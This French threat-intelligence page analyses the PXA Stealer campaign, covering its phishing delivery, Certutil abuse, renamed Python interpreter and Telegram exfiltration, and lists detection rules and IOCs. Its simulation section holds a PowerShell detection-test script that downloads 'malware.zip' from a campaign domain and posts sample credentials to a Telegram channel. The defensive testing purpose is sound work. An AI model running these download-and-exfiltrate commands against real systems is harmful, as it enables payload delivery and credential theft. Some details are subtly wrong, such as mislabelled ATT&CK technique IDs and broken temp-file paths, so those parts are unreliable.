Du phishing à l’exfiltration : Analyse approfondie de PXA Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport décrit une forte augmentation de l’activité de PXA Stealer ciblant les organisations financières au début de 2026. Les acteurs de la menace diffusent des archives ZIP malveillantes via des e-mails de phishing et s’appuient sur une chaîne d’infection multi-étapes qui abuse des outils système légitimes et d’un interpréteur Python renommé. Une fois actif, le malware vole les identifiants de navigateur, les mots de passe enregistrés et les données des portefeuilles de crypto-monnaies, puis exfiltre les informations collectées via Telegram. La campagne souligne comment les opérateurs ont ajusté leur mode opératoire suite aux perturbations antérieures d’autres écosystèmes d’infostealers.
Enquête
Les chercheurs de CyberProof ont reconstruit la chaîne d’attaque complète, commençant par un e-mail de phishing qui a livré une archive Pumaproject.zip malveillante et se terminant par une exfiltration basée sur Telegram. Leur analyse a identifié l’abus de Certutil pour le décodage, une copie de WinRAR déguisée en picture.png pour l’extraction, un dossier Dots caché, et un interpréteur Python renommé svchost.exe utilisé pour lancer un script obfusqué lié à un identifiant de bot. La persistance est maintenue grâce à une entrée de valeur de registre.
Atténuation
Les défenseurs doivent identifier les pièces jointes d’archive suspectes, surveiller l’exécution de scripts et les LOLBins connus à partir de chemins inattendus, et bloquer le trafic sortant vers Telegram ainsi que des TLD inhabituels tels que .shop and .xyz. Les équipes de sécurité doivent également renforcer les passerelles de messagerie et appliquer des contrôles stricts d’exécution aux fichiers Office et au contenu basé sur des scripts.
Réponse
Lorsqu’un PXA Stealer est détecté, isolez le hôte affecté, capturez les preuves volatiles, et recherchez les artefacts de fichiers référencés et les modifications du registre. Supprimez les fichiers malveillants, terminez les processus affectés, et réinitialisez tous les identifiants exposés. Les équipes doivent ensuite effectuer une chasse aux menaces plus large pour identifier des indicateurs correspondants à travers l’environnement et informer les parties prenantes concernées.
Flux d’Attaque
Détections
Exécution de Processus Systèmes depuis des Chemins Atypiques (via process_creation)
Voir
Commande et Contrôle Suspect par Requête DNS de Domaine de Premier Niveau (TLD) Inhabituels (via dns)
Voir
Exécution Suspecte depuis le Profil Public de l’Utilisateur (via process_creation)
Voir
Extension Inhabituelle de Binary Exécutable (via process_creation)
Voir
Fichiers Suspects dans le Profil Public de l’Utilisateur (via file_event)
Voir
Utilisation de Certutil pour le Codage des Données et Opérations Cert (via cmdline)
Voir
IOC (HashMd5) à détecter : De l’Hameçonnage à l’Exfiltration : Une Plongée dans PXA Stealer Partie 2
Voir
IOC (DestinationIP) à détecter : De l’Hameçonnage à l’Exfiltration : Une Plongée dans PXA Stealer
Voir
IOC (HashMd5) à détecter : De l’Hameçonnage à l’Exfiltration : Une Plongée dans PXA Stealer Partie 1
Voir
IOC (SourceIP) à détecter : De l’Hameçonnage à l’Exfiltration : Une Plongée dans PXA Stealer
Voir
IOC (HashSha256) à détecter : De l’Hameçonnage à l’Exfiltration : Une Plongée dans PXA Stealer
Voir
Détection des Activités d’Exécution de PXA Stealer [Création de Processus Windows]
Voir
Détecter les Connexions Sortantes de PXA Stealer [Connexion Réseau Windows]
Voir
Exécution de Simulation
Prérequis : La Vérification Pré-vol de Télémétrie & Baseline doit avoir réussi.
Rationale : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narrative d’Attaque & Commandes :
L’acteur de la menace déploie le PXA Stealer sur un hôte Windows compromis. Après que l’utilisateur ait exécuté sans le savoir le binaire malveillant initial (T1204.002), le stealer exécute un extrait de PowerShell qui :-
Télécharge un ZIP malveillant du domaine codé en dur
downloadtheproject.xyz(T1202 – exécution indirecte de commande). -
Exfiltre les données récoltées en postant un message à un canal Telegram via
t.me(T1559.002 – lien de phishing). - Charge éventuellement un composant COM malveillant pour atteindre la persistance (T1127.002).
Les deux requêtes HTTP GET sortantes génèrent les
champs DestinationDomainque la règle Sigma surveille, provoquant une alerte. -
Télécharge un ZIP malveillant du domaine codé en dur
-
Script de Test de Régression :
# Simulation de PXA Stealer – déclenche la règle de détection $tmpZip = "$env:TEMPpayload.zip" $tmpMsg = "$env:TEMPsteal.txt" # 1. Télécharge le ZIP malveillant depuis le premier domaine malveillant Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing # 2. Simule l'exfiltration de données via le lien Telegram $payload = "Identifiants utilisateur : admin / Pass123!" Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing # 3. (Optionnel) Charge un objet COM factice pour émuler T1127.002 try { $com = New-Object -ComObject "Shell.Application" $com.ShellExecute($tmpZip, "", "", "ouvrir", 0) | Out-Null } catch { # Ignorer les erreurs – ceci est uniquement pour la télémétrie } -
Commandes de Nettoyage :
# Supprime les artefacts créés par la simulation Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue